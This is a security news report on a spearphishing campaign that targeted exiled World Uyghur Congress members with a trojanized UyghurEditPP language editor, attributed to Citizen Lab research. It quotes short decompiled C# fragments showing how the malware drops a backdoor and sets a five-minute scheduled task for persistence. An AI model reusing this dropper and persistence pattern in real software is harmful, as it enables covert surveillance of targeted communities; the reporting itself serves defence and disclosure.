Threat Actors Weaponize Language Software to Windows-Based Remote Surveillance Malware
Senior members of the World Uyghur Congress (WUC) living in exile became targets of a sophisticated spearphishing campaign delivering Windows-based surveillance malware. The attack utilized a trojanized version of UyghurEditPP, a legitimate open-source word processing tool developed to support the preservation of the Uyghur language. This malicious adaptation exploited the trust within the Uyghur community, […] The post Threat Actors Weaponize Language Software to Windows-Based Remote Surveillance Malware appeared first on Cyber Security News.
Senior members of the World Uyghur Congress (WUC) living in exile became targets of a sophisticated spearphishing campaign delivering Windows-based surveillance malware.
The attack utilized a trojanized version of UyghurEditPP, a legitimate open-source word processing tool developed to support the preservation of the Uyghur language.
.webp)
This malicious adaptation exploited the trust within the Uyghur community, weaponizing cultural software against the very population it was designed to serve.
The disguised malware possessed capabilities to profile victims’ systems, transmit sensitive information to command and control servers, and download additional malicious plugins.
The attackers demonstrated intimate knowledge of their targets, incorporating cultural references and leveraging community needs to enhance the campaign’s effectiveness.
Though not technically groundbreaking, the delivery method showed remarkable social engineering, with evidence suggesting preparation began as early as May 2024.
The Citizen Lab researchers identified this malware after investigating Google notifications received by WUC members warning of government-backed attacks.
Their analysis revealed a campaign that perfectly illustrates digital transnational repression – when governments use digital technologies to surveil, intimidate, and silence exiled and diaspora communities.
The targeting of Uyghur language software reflects how threat actors exploit cultural preservation tools to compromise the very communities they were designed to serve.
This attack continues a pattern of digital threats against the Uyghur diaspora, a community already subjected to extensive surveillance both within China’s Xinjiang region and abroad.
The attack represents not just a cybersecurity concern but an assault on cultural identity, as it undermines trust in the specialized tools necessary for language preservation.
Infection Mechanism
The infection chain began with emails impersonating a trusted partner organization, requesting recipients to test Uyghur language software.
The message referenced Ramadan and expressed sympathy for the Uyghur cause to establish cultural legitimacy.
.webp)
Recipients who followed the Google Drive link downloaded a password-protected RAR archive containing the trojanized application.
When executed, the malware performed its expected language processing functions while simultaneously installing a backdoor named “GheyretDetector.exe” – cleverly named after the authentic developer of the original software.
Analysis of the code revealed that the malware’s key functionality resided in the MainFormLoad event:-
private void MainFormLoad(object sender, EventArgs e)
{
string text = AppDomain.CurrentDomain.BaseDirectory + "\\GheyretDetector.exe";
if (!File.Exists(text))
{
releaseFile(text);
}
AddUpdater(text);
}For persistence, the malware created a scheduled task named “gheyretUpdater” that executed every five minutes, ensuring continuous operation even after system reboots.
This scheduler used specific parameters to appear legitimate:-
private void AddUpdater(string filename)
{
string creator = "gheyret";
string taskName = "gheyretUpdater";
string interval = "PT5M";
_TASK_STATE tASK_STATE = UpdaterTasks.CreateTaskScheduler(creator, taskName, filename, interval);
}The command and control infrastructure employed domains with Uyghur cultural significance – “tengri” (Sky God) and “anar” (to commemorate) – demonstrating the attackers’ cultural knowledge.
These domains resolved to IP addresses associated with AS20473, an autonomous system frequently abused by threat actors.
This campaign illustrates how determined actors effectively target specific communities through cultural engineering rather than technical exploits alone. It creates a digital dilemma for those developing specialized software for marginalized communities, as these essential tools for cultural preservation can become vectors for surveillance and repression.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post Threat Actors Weaponize Language Software to Windows-Based Remote Surveillance Malware appeared first on Cyber Security News.
